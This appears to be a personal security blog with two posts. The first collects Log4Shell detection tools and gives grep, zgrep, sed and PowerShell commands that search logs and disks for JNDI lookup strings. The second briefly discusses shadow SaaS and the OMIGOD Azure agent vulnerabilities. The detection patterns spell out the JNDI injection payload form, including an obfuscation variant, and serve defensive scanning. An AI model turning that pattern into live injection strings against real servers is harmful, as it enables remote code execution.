Wednesday, 15 December 2021

Critical vulnerability in Apache Log4j | LOG4J (Resources for detection)


LOG4J (Resources for detection):

==========================

Automatic approach:

--------------------------------------

1. Nmap: https://github.com/Diverto/nse-log4shell 


2. Burp Suite (Log4Shell Scanner) : https://portswigger.net/bappstore/b011be53649346dd87276bca41ce8e8f?tid=WIEX41vaM_H0cjTxCVjpJYK2RewzR2IWa54E47BfFFBiVsg46cJlReIiH1nh2tPJ


3. Detector :  https://github.com/Neo23x0/log4shell-detector


4: log4j-finder : https://github.com/fox-it/log4j-finder


Manual approach:

--------------------------------------

Command 1 : 

$ sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log

Command 2 : 
$ sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+'

Command 3 : 
$ sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -I -i 'jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'" \;
Command 4 : 
$ sudo find /var/log/ -name '*.gz' -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'" \;


Command 5 : Windows

gci 'C:\' -rec -force -include *.jar -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path

Vulnerable Programs: https://github.com/NCSC-NL/log4shell/tree/main/software



Wednesday, 15 September 2021

IoT security attack surface

Shadow in the cloud computing

Shadow SaaS

An unapproved cloud application that is connected in some way (usually via API) to that organization's SaaS or IaaS with access to corporate data but without permission from the organization.

how the cloud company installed agents on client' server without permission this is security breach or security compliance.??

For example: Microsoft Azure silently installs management agents on its Linux virtual machines, which now have RCE and LPE vulns.  #OMIGOD